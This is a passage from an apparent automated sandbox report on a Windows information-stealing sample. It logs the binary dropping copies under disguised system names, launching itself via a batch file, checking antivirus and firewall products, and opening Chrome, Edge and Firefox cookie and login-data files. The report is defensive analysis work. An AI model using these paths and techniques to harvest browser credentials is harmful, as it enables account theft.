                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File opened: C:\Users\user\AppData\Local\Temp
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File opened: C:\Users\user\AppData\Local
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe File opened: C:\Users\user\Desktop\desktop.ini
                              Source: wE9Ave0HPL.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                              Source: wE9Ave0HPL.7.drBinary or memory string: discord.comVMware20,11696428655f
                              Source: wE9Ave0HPL.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: global block list test formVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                              Source: wE9Ave0HPL.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                              Source: wE9Ave0HPL.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                              Source: wE9Ave0HPL.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                              Source: wE9Ave0HPL.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                              Source: wE9Ave0HPL.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                              Source: services.exe, 00000007.00000002.3378774424.000000001BD9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: wE9Ave0HPL.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
                              Source: wE9Ave0HPL.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                              Source: wE9Ave0HPL.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: AMC password management pageVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                              Source: wE9Ave0HPL.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                              Source: wE9Ave0HPL.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                              Source: wE9Ave0HPL.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
                              Source: wE9Ave0HPL.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                              Source: XNPOazHpXF.exe, OfJItdCHnFwJKGdVvarOLqclbfs.exe.0.dr, dllhost.exe.0.dr, XNPOazHpXF.exe.0.dr, services.exe.0.dr, conhost.exe.0.drBinary or memory string: qEmuPae9hmh
                              Source: wE9Ave0HPL.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                              Source: wE9Ave0HPL.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                              Source: wE9Ave0HPL.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                              Source: wE9Ave0HPL.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Process information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Process token adjusted: Debug
                              Source: C:\Windows\InputMethod\CHT\services.exe Process token adjusted: Debug
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Memory allocated: page read and write | page guard
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\InputMethod\CHT\services.exe "C:\Windows\InputMethod\CHT\services.exe"
                              Source: services.exe, 00000007.00000002.3303823064.00000000034D1000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000035C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                              Source: services.exe, 00000007.00000002.3303823064.00000000035C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerp
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Queries volume information: C:\Users\user\Desktop\XNPOazHpXF.exe VolumeInformation
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\InputMethod\CHT\services.exe Queries volume information: C:\Windows\InputMethod\CHT\services.exe VolumeInformation
                              Source: C:\Windows\InputMethod\CHT\services.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Windows\InputMethod\CHT\services.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Windows\InputMethod\CHT\services.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: C:\Windows\InputMethod\CHT\services.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\InputMethod\CHT\services.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              Source: Yara match File source: 00000007.00000002.3303823064.0000000003794000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: XNPOazHpXF.exe PID: 5688, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: services.exe PID: 1352, type: MEMORYSTR
                              Source: Yara match File source: XNPOazHpXF.exe, type: SAMPLE
                              Source: Yara match File source: 0.0.XNPOazHpXF.exe.fb0000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000000.00000000.2052319303.0000000000FB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match File source: C:\Recovery\dllhost.exe, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe, type: DROPPED
                              Source: Yara match File source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe, type: DROPPED
                              Source: Yara match File source: C:\Recovery\conhost.exe, type: DROPPED
                              Source: Yara match File source: C:\Windows\InputMethod\CHT\services.exe, type: DROPPED
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Windows\InputMethod\CHT\services.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
